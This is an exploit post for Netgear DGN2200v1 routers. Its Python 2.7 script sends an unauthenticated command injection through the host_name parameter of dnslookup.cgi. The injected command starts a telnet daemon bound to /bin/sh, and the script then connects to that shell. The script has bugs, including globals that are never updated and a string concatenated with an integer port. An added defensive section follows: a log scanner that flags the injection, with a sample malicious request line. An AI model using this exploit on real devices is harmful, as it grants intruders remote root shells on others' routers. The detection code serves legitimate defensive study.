Netgear DGN2200v1 - Remote Command Execution (RCE) (Unauthenticated)


HACK1949


# Exploit Title: Netgear DGN2200v1 - Remote Command Execution (RCE) (Unauthenticated)
# Date: 02.07.2021
# Exploit Author: SivertPL
# Vendor Homepage: https://www.netgear.com/
# Version: All prior to v1.0.0.60

#!/usr/bin/python

"""
NETGEAR DGN2200v1 Unauthenticated Remote Command Execution

Author: SivertPL (kroppoloe@protonmail.ch)
Date: 02.07.2021
Status: Patched in some models
Version: All prior to v1.0.0.60
Impact: Critical 

CVE: No CVE number assigned
PSV: PSV-2020-0363, PSV-2020-0364, PSV-2020-0365


References: 
    1) https://www.microsoft.com/security/blog/2021/06/30/microsoft-finds-new-netgear-firmware-vulnerabilities-that-could-lead-to-identity-theft-and-full-system-compromise/
    2) https://kb.netgear.com/000062646/Security-Advisory-for-Multiple-HTTPd-Authentication-Vulnerabilities-on-DGN2200v1


The exploit script only works on UNIX-based systems.

This ancient vulnerability works on other models utilizing Bezeq firmware, so not just DGN2200v1 is vulnerable. It is estimated that around 7-10 other models might be or might have been vulnerable in the past.
This is a very old exploit, dating back to 2017, so forgive me for Python2.7 lol.

"""

import sys
import requests
import os

target_ip = "192.168.0.1"
telnet_port = 666
sent = False

def main():
    if len(sys.argv) < 3:
        print "./dgn2200_pwn.py <router ip> <backdoor-port>"
        exit()

    target_ip = sys.argv[1]
    telnet_port = int(sys.argv[2])
    print "[+] Sending the payload to " + target_ip + " and opening the backdoor ..."
    send_payload()
    print "[+] Trying to connect to the backdoor for " + str(telnet_port) + " ..."
    print "[!] If it fails to connect it means the target is probably not vulnerable"
    spawn_shell()

def send_payload():
    try:
        requests.get("http://" + target_ip + "/dnslookup.cgi?host_name=www.google.com; /usr/sbin/telnetd -p " + str(telnet_port) + " -l /bin/sh" + str(telnet_port) + "&lookup=Lookup&ess_=true")
        sent = True
    except Exception:
        sent = False
        print "[-] Unknown error, target might not be vulnerable."

def spawn_shell():
    if sent:
        print "[+] Dropping a shell..."
        os.system("telnet " + target_ip + " " + telnet_port)
    else:
        exit()


if __name__ == "__main__":
    main()
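A defensive counterpart, added here and not part of SivertPL's post: a log scanner that flags requests to dnslookup.cgi whose host_name parameter is anything other than a plain hostname, which is the exact vector the script above abuses. The Common Log Format lines, the source addresses and the hostname regex are constructed assumptions; the query splitter is hand-written because older urllib.parse.parse_qs treated ';' as a separator and would silently drop the injected part of the value.

```python
import re
from urllib.parse import urlsplit, unquote, unquote_plus

# RFC 1123-style hostname: dot-separated labels of letters, digits and hyphens.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)(?!-)[A-Za-z0-9-]{1,63}(?<!-)(\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*\.?$")

# Common Log Format request line; fields after the status code are ignored.
REQUEST_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<url>\S+) [^"]*" (?P<status>\d{3})')

# Constructed sample log lines (not real traffic); the second carries the injection.
SAMPLE_LOG = """\
192.168.0.50 - - [02/Jul/2021:10:00:01 +0000] "GET /dnslookup.cgi?host_name=www.google.com&lookup=Lookup HTTP/1.1" 200 512
192.168.0.77 - - [02/Jul/2021:10:00:09 +0000] "GET /dnslookup.cgi?host_name=www.google.com;%20/usr/sbin/telnetd%20-p%20666%20-l%20/bin/sh&lookup=Lookup&ess_=true HTTP/1.1" 200 512
192.168.0.50 - - [02/Jul/2021:10:01:00 +0000] "GET /index.htm HTTP/1.1" 200 2048
"""

def query_params(query: str) -> dict:
    """Split only on '&'. Older urllib.parse.parse_qs also split on ';',
    which would cut the injected command off the host_name value and hide it."""
    params = {}
    for pair in query.split("&"):
        key, _, value = pair.partition("=")
        params.setdefault(unquote_plus(key), []).append(unquote_plus(value))
    return params

def is_suspicious_lookup(url: str) -> bool:
    """True if url targets dnslookup.cgi and host_name is not a plain hostname."""
    parts = urlsplit(url)
    if not parts.path.endswith("/dnslookup.cgi"):
        return False
    values = query_params(parts.query).get("host_name", [])
    # An absent parameter is not an injection; an empty or malformed one is flagged.
    return any(not HOSTNAME_RE.match(v) for v in values)

def scan_log(text: str) -> list:
    """Return (source_ip, decoded_url) for each request flagged by is_suspicious_lookup."""
    hits = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if m and is_suspicious_lookup(m.group("url")):
            hits.append((m.group("src"), unquote(m.group("url"))))
    return hits

if __name__ == "__main__":
    for src, url in scan_log(SAMPLE_LOG):
        print(f"[!] possible dnslookup.cgi command injection from {src}: {url}")
```

Run it against the router's HTTP access log; a hit means the injection was at least attempted, and the firmware should be checked against the fixed version named in the advisory.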